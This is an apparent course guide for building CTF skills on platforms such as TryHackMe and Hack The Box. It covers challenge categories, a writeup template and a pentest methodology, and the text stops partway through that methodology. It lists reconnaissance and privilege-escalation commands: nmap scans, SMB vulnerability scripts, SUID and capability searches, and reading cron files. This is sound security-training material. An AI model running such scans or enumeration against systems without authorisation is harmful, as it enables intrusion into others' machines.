Project 3: Complete CTF Challenges on Multiple Platforms

Project 3: Complete CTF Challenges on Multiple Platforms

Project Overview

Attribute Value
Difficulty Progressive (Beginner to Advanced)
Time Estimate 1 month+ (ongoing practice)
Primary Languages Python, Bash, C
Primary Tools TryHackMe, Hack The Box, Kali Linux
Main Book โ€œLinux Basics for Hackersโ€ by OccupyTheWeb
Knowledge Area Security, Binary Exploitation, Forensics, Reverse Engineering

Learning Objectives

By completing this project, you will:

  1. Develop the hacker mindset - Learn to think creatively and persistently when stuck
  2. Build a mental vulnerability library - Recognize patterns from exposure to 100+ challenges
  3. Master enumeration techniques - The skill that separates successful hackers from failed ones
  4. Practice privilege escalation - Linux and Windows, manual and automated
  5. Document solutions professionally - Write blog-quality writeups that demonstrate understanding

The Core Question

โ€œHow do I develop the pattern recognition and problem-solving skills that let experienced hackers โ€˜just knowโ€™ where to look?โ€

This project isnโ€™t about building codeโ€”itโ€™s about building expertise through deliberate practice. CTF challenges compress years of real-world vulnerability patterns into digestible puzzles. Each flag you capture represents a concept youโ€™ve internalized.


Deep Theoretical Foundation

What CTF Teaches That Courses Donโ€™t

THE CTF LEARNING CYCLE
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚                                                                     โ”‚
โ”‚  1. ENCOUNTER CHALLENGE                                            โ”‚
โ”‚     "I need to get root on this Linux box"                         โ”‚
โ”‚                                                                     โ”‚
โ”‚                           โ”‚                                         โ”‚
โ”‚                           โ–ผ                                         โ”‚
โ”‚                                                                     โ”‚
โ”‚  2. ENUMERATE EXTENSIVELY                                          โ”‚
โ”‚     Spend 80% of time here                                         โ”‚
โ”‚     - What services are running?                                   โ”‚
โ”‚     - What version is that software?                               โ”‚
โ”‚     - Are there hidden directories?                                โ”‚
โ”‚     - What can this user do?                                       โ”‚
โ”‚                                                                     โ”‚
โ”‚                           โ”‚                                         โ”‚
โ”‚                           โ–ผ                                         โ”‚
โ”‚                                                                     โ”‚
โ”‚  3. HIT A WALL                                                     โ”‚
โ”‚     "I've tried everything I know"                                 โ”‚
โ”‚     This is where learning happens                                 โ”‚
โ”‚                                                                     โ”‚
โ”‚                           โ”‚                                         โ”‚
โ”‚          โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”                       โ”‚
โ”‚          โ”‚                                 โ”‚                       โ”‚
โ”‚          โ–ผ                                 โ–ผ                       โ”‚
โ”‚                                                                     โ”‚
โ”‚  4a. RESEARCH                          4b. ASK FOR HINTS           โ”‚
โ”‚      Google error messages             Use forum hints sparingly   โ”‚
โ”‚      Read documentation                Watch walkthrough later     โ”‚
โ”‚      Study similar vulnerabilities                                 โ”‚
โ”‚                                                                     โ”‚
โ”‚          โ”‚                                 โ”‚                       โ”‚
โ”‚          โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ฌโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜                       โ”‚
โ”‚                           โ”‚                                         โ”‚
โ”‚                           โ–ผ                                         โ”‚
โ”‚                                                                     โ”‚
โ”‚  5. BREAKTHROUGH                                                   โ”‚
โ”‚     "That's why it works!"                                         โ”‚
โ”‚     The eureka moment that creates lasting knowledge               โ”‚
โ”‚                                                                     โ”‚
โ”‚                           โ”‚                                         โ”‚
โ”‚                           โ–ผ                                         โ”‚
โ”‚                                                                     โ”‚
โ”‚  6. DOCUMENT                                                       โ”‚
โ”‚     Write up what you learned                                      โ”‚
โ”‚     Future you will thank present you                              โ”‚
โ”‚                                                                     โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

CTF Learning Cycle - Iterative Problem-Solving Process

CTF Categories and What They Teach

CTF CHALLENGE CATEGORIES
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

WEB EXPLOITATION
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  What you'll encounter:                                            โ”‚
โ”‚  - SQL injection (manual, not just SQLMap)                         โ”‚
โ”‚  - XSS challenges with creative filter bypasses                    โ”‚
โ”‚  - Authentication bypasses                                         โ”‚
โ”‚  - Server-Side Request Forgery (SSRF)                             โ”‚
โ”‚  - File upload vulnerabilities                                     โ”‚
โ”‚  - Template injection                                              โ”‚
โ”‚                                                                     โ”‚
โ”‚  Skills developed:                                                 โ”‚
โ”‚  - HTTP protocol mastery                                           โ”‚
โ”‚  - Understanding server-side processing                            โ”‚
โ”‚  - Creative payload crafting                                       โ”‚
โ”‚                                                                     โ”‚
โ”‚  Platforms: PortSwigger Academy, OWASP WebGoat, Juice Shop        โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

BINARY EXPLOITATION (PWN)
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  What you'll encounter:                                            โ”‚
โ”‚  - Buffer overflows (stack and heap)                               โ”‚
โ”‚  - Format string vulnerabilities                                   โ”‚
โ”‚  - Return-oriented programming (ROP)                               โ”‚
โ”‚  - Shellcode development                                           โ”‚
โ”‚                                                                     โ”‚
โ”‚  Skills developed:                                                 โ”‚
โ”‚  - Assembly language reading                                       โ”‚
โ”‚  - Memory layout understanding                                     โ”‚
โ”‚  - GDB debugging                                                   โ”‚
โ”‚  - Exploit development                                             โ”‚
โ”‚                                                                     โ”‚
โ”‚  Platforms: PicoCTF, pwnable.kr, ROP Emporium                     โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

REVERSE ENGINEERING
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  What you'll encounter:                                            โ”‚
โ”‚  - Crackmes (find the password)                                    โ”‚
โ”‚  - Malware analysis                                                โ”‚
โ”‚  - Obfuscated code                                                 โ”‚
โ”‚  - Custom encryption                                               โ”‚
โ”‚                                                                     โ”‚
โ”‚  Skills developed:                                                 โ”‚
โ”‚  - Reading disassembly (x86, x64, ARM)                            โ”‚
โ”‚  - Understanding program flow                                      โ”‚
โ”‚  - Pattern recognition in binaries                                 โ”‚
โ”‚  - Tool mastery (Ghidra, IDA, radare2)                            โ”‚
โ”‚                                                                     โ”‚
โ”‚  Platforms: crackmes.one, Reverse Engineering challenges           โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

CRYPTOGRAPHY
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  What you'll encounter:                                            โ”‚
โ”‚  - Classical ciphers (Caesar, Vigenรจre)                           โ”‚
โ”‚  - Modern crypto weaknesses (weak RSA, ECB mode)                   โ”‚
โ”‚  - Hash cracking                                                   โ”‚
โ”‚  - Padding oracle attacks                                          โ”‚
โ”‚                                                                     โ”‚
โ”‚  Skills developed:                                                 โ”‚
โ”‚  - Mathematical foundations of cryptography                        โ”‚
โ”‚  - Identifying weak implementations                                โ”‚
โ”‚  - Using crypto tools (hashcat, John)                             โ”‚
โ”‚                                                                     โ”‚
โ”‚  Platforms: CryptoHack, PicoCTF crypto challenges                  โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

FORENSICS
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  What you'll encounter:                                            โ”‚
โ”‚  - Memory dumps (Volatility)                                       โ”‚
โ”‚  - Network packet captures (Wireshark)                             โ”‚
โ”‚  - File recovery and analysis                                      โ”‚
โ”‚  - Steganography                                                   โ”‚
โ”‚                                                                     โ”‚
โ”‚  Skills developed:                                                 โ”‚
โ”‚  - Evidence analysis                                               โ”‚
โ”‚  - Understanding file formats                                      โ”‚
โ”‚  - Timeline reconstruction                                         โ”‚
โ”‚  - Tool proficiency (Autopsy, FTK)                                โ”‚
โ”‚                                                                     โ”‚
โ”‚  Platforms: Digital Forensics challenges, CTFtime events           โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

BOOT2ROOT (Full Machine Compromise)
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  What you'll encounter:                                            โ”‚
โ”‚  - Full attack chain simulation                                    โ”‚
โ”‚  - Enumeration โ†’ Exploitation โ†’ Privilege Escalation              โ”‚
โ”‚  - Realistic machine configurations                                โ”‚
โ”‚                                                                     โ”‚
โ”‚  Skills developed:                                                 โ”‚
โ”‚  - Complete penetration testing methodology                        โ”‚
โ”‚  - Combining multiple vulnerabilities                              โ”‚
โ”‚  - Persistence and patience                                        โ”‚
โ”‚                                                                     โ”‚
โ”‚  Platforms: Hack The Box, TryHackMe, VulnHub                      โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

The Enumeration Mindset

Enumeration is where 80% of hacking happens. Most beginners rush to exploitation; experts enumerate exhaustively:

ENUMERATION HIERARCHY
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

NETWORK LEVEL
โ”‚
โ”œโ”€โ”€ What hosts are alive?
โ”‚   โ””โ”€โ”€ nmap -sn 192.168.1.0/24
โ”‚
โ”œโ”€โ”€ What ports are open?
โ”‚   โ””โ”€โ”€ nmap -sV -sC -p- target
โ”‚
โ”œโ”€โ”€ What services are running?
โ”‚   โ””โ”€โ”€ Detailed version info
โ”‚
โ””โ”€โ”€ What OS is it?
    โ””โ”€โ”€ nmap -O target

SERVICE LEVEL (for each open port)
โ”‚
โ”œโ”€โ”€ HTTP/HTTPS (80, 443, 8080)
โ”‚   โ”œโ”€โ”€ Technology stack?
โ”‚   โ”‚   โ””โ”€โ”€ Wappalyzer, whatweb
โ”‚   โ”œโ”€โ”€ Directories?
โ”‚   โ”‚   โ””โ”€โ”€ gobuster, feroxbuster
โ”‚   โ”œโ”€โ”€ Subdomains?
โ”‚   โ”‚   โ””โ”€โ”€ Virtual host enumeration
โ”‚   โ”œโ”€โ”€ Parameters?
โ”‚   โ”‚   โ””โ”€โ”€ Burp Suite spider
โ”‚   โ””โ”€โ”€ Known vulnerabilities?
โ”‚       โ””โ”€โ”€ searchsploit, CVE search
โ”‚
โ”œโ”€โ”€ SMB (445)
โ”‚   โ”œโ”€โ”€ Shares accessible?
โ”‚   โ”‚   โ””โ”€โ”€ smbclient -L //target
โ”‚   โ”œโ”€โ”€ Anonymous access?
โ”‚   โ”‚   โ””โ”€โ”€ smbmap -H target
โ”‚   โ””โ”€โ”€ Version? (EternalBlue?)
โ”‚       โ””โ”€โ”€ nmap --script smb-vuln*
โ”‚
โ”œโ”€โ”€ SSH (22)
โ”‚   โ”œโ”€โ”€ Version?
โ”‚   โ”œโ”€โ”€ Allowed authentication methods?
โ”‚   โ””โ”€โ”€ User enumeration possible?
โ”‚
โ”œโ”€โ”€ FTP (21)
โ”‚   โ”œโ”€โ”€ Anonymous access?
โ”‚   โ”œโ”€โ”€ Version vulnerabilities?
โ”‚   โ””โ”€โ”€ Writable directories?
โ”‚
โ””โ”€โ”€ Custom/Unknown ports
    โ””โ”€โ”€ Connect and observe banner/response

USER LEVEL (after initial access)
โ”‚
โ”œโ”€โ”€ Who am I?
โ”‚   โ””โ”€โ”€ whoami, id
โ”‚
โ”œโ”€โ”€ What can I do?
โ”‚   โ””โ”€โ”€ sudo -l
โ”‚
โ”œโ”€โ”€ What's special about this system?
โ”‚   โ”œโ”€โ”€ SUID binaries: find / -perm -4000
โ”‚   โ”œโ”€โ”€ Capabilities: getcap -r /
โ”‚   โ”œโ”€โ”€ Cron jobs: cat /etc/crontab
โ”‚   โ””โ”€โ”€ Interesting files: find / -name "*.txt" -o -name "*.conf"
โ”‚
โ”œโ”€โ”€ What's running?
โ”‚   โ””โ”€โ”€ ps aux, netstat -tulpn
โ”‚
โ””โ”€โ”€ What can I read?
    โ””โ”€โ”€ Config files, logs, backups

Project Specification

What Youโ€™re Building

Unlike previous projects, this one produces documented solutions rather than code. Your deliverables:

ctf-writeups/
โ”œโ”€โ”€ README.md                  # Index of all completed challenges
โ”œโ”€โ”€ tryhackme/
โ”‚   โ”œโ”€โ”€ beginner-path/
โ”‚   โ”‚   โ”œโ”€โ”€ tutorial.md
โ”‚   โ”‚   โ””โ”€โ”€ basic-pentesting.md
โ”‚   โ””โ”€โ”€ offensive-security/
โ”‚       โ”œโ”€โ”€ vulnversity.md
โ”‚       โ””โ”€โ”€ kenobi.md
โ”œโ”€โ”€ hackthebox/
โ”‚   โ”œโ”€โ”€ easy/
โ”‚   โ”‚   โ”œโ”€โ”€ lame.md
โ”‚   โ”‚   โ””โ”€โ”€ legacy.md
โ”‚   โ””โ”€โ”€ medium/
โ”‚       โ””โ”€โ”€ active.md
โ”œโ”€โ”€ picoctf/
โ”‚   โ”œโ”€โ”€ web/
โ”‚   โ”œโ”€โ”€ forensics/
โ”‚   โ””โ”€โ”€ binary/
โ”œโ”€โ”€ scripts/
โ”‚   โ”œโ”€โ”€ enumeration/
โ”‚   โ”‚   โ”œโ”€โ”€ linux-enum.sh
โ”‚   โ”‚   โ””โ”€โ”€ windows-enum.ps1
โ”‚   โ””โ”€โ”€ exploits/
โ”‚       โ””โ”€โ”€ custom-exploits.py
โ””โ”€โ”€ cheatsheets/
    โ”œโ”€โ”€ linux-privesc.md
    โ”œโ”€โ”€ windows-privesc.md
    โ””โ”€โ”€ web-attacks.md

Challenge Completion Requirements

Phase 1: Foundation (Weeks 1-2)

TryHackMe - Complete Beginner Path

  • Tutorial room
  • Linux Fundamentals 1-3
  • Network Fundamentals
  • Web Fundamentals
  • Basic Pentesting

OverTheWire - Bandit (All 34 levels)

  • Levels 0-10 (Linux basics)
  • Levels 11-20 (File manipulation)
  • Levels 21-34 (Advanced concepts)

PicoCTF - Beginner challenges

  • 10 Web challenges
  • 10 Forensics challenges
  • 5 Crypto challenges

Phase 2: Skill Building (Weeks 3-4)

TryHackMe - Offensive Security Path

  • Vulnversity
  • Kenobi
  • Basic Pentesting
  • Mr Robot
  • Blue

Hack The Box - Easy Machines (5 total)

  • First machine (any)
  • Second machine (different OS)
  • Third machine (web-focused)
  • Fourth machine (AD related if available)
  • Fifth machine (any)

Phase 3: Intermediate (Weeks 5-8)

Hack The Box - Medium Machines (5 total)

  • At least 2 Windows machines
  • At least 2 Linux machines
  • 1 with Active Directory

PortSwigger Web Security Academy

  • SQL Injection (all apprentice labs)
  • XSS (all apprentice labs)
  • Authentication (all apprentice labs)

Phase 4: Specialization (Ongoing)

Choose your focus:

  • Web: More PortSwigger, bug bounty programs
  • Binary: pwnable.kr, ROP Emporium
  • Forensics: Digital forensics challenges
  • AD: HackTheBox Pro Labs

Writeup Requirements

Each writeup must include:

# [Challenge Name] - [Platform]

## Challenge Info
- **Difficulty**: Easy/Medium/Hard
- **Category**: Web/PWN/Forensics/Crypto/Boot2Root
- **Points**: X (if applicable)
- **Date Completed**: YYYY-MM-DD

## Summary
One paragraph explaining what this challenge taught you.

## Enumeration
### Initial Recon
- What ports/services did you find?
- What technology stack?
- What caught your attention?

### Detailed Enumeration
- Directory brute-forcing results
- Service-specific enumeration
- Credentials/information discovered

## Exploitation
### Vulnerability Identification
- What vulnerability did you find?
- How did you confirm it?

### Exploit Development/Usage
- Step-by-step exploitation
- Commands used (with explanations)
- Screenshots where helpful

## Privilege Escalation (if applicable)
### User to Root
- Enumeration on the machine
- Privilege escalation vector found
- How you exploited it

## Flags
- User flag: [location]
- Root flag: [location]

## Lessons Learned
- What was new to you?
- What would you do differently?
- What tools/techniques to remember?

## Resources Used
- Links to helpful articles
- Tools used
- Related CVEs

Solution Architecture (Methodology)

The Penetration Testing Methodology

STANDARD PENTEST METHODOLOGY FOR CTF
โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  PHASE 1: RECONNAISSANCE                                          โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚                                                                    โ”‚
โ”‚  Network Scanning:                                                 โ”‚
โ”‚  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ” โ”‚
โ”‚  โ”‚  # Fast initial scan                                          โ”‚ โ”‚
โ”‚  โ”‚  nmap -sV -sC -oN initial.txt TARGET                         โ”‚ โ”‚
โ”‚  โ”‚                                                               โ”‚ โ”‚
โ”‚  โ”‚  # Full port scan (background)                                โ”‚ โ”‚
โ”‚  โ”‚  nmap -p- -oN allports.txt TARGET                            โ”‚ โ”‚
โ”‚  โ”‚                                                               โ”‚ โ”‚
โ”‚  โ”‚  # UDP scan for common ports                                  โ”‚ โ”‚
โ”‚  โ”‚  nmap -sU --top-ports=20 TARGET                              โ”‚ โ”‚
โ”‚  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜ โ”‚
โ”‚                                                                    โ”‚
โ”‚  Service Enumeration (for each port):                              โ”‚
โ”‚  โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ” โ”‚
โ”‚  โ”‚  HTTP:  gobuster, nikto, whatweb                             โ”‚ โ”‚
โ”‚  โ”‚  SMB:   smbclient, smbmap, enum4linux                        โ”‚ โ”‚
โ”‚  โ”‚  FTP:   anonymous login test, version check                   โ”‚ โ”‚
โ”‚  โ”‚  SSH:   version check, user enumeration                       โ”‚ โ”‚
โ”‚  โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜ โ”‚
โ”‚                                                                    โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
                              โ”‚
                              โ–ผ
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚  PHASE 2: VULNERABILITY IDENTIFICATION                            โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚                                                                    โ”‚
โ”‚  Search for known vulnerabilities:                                 โ”‚
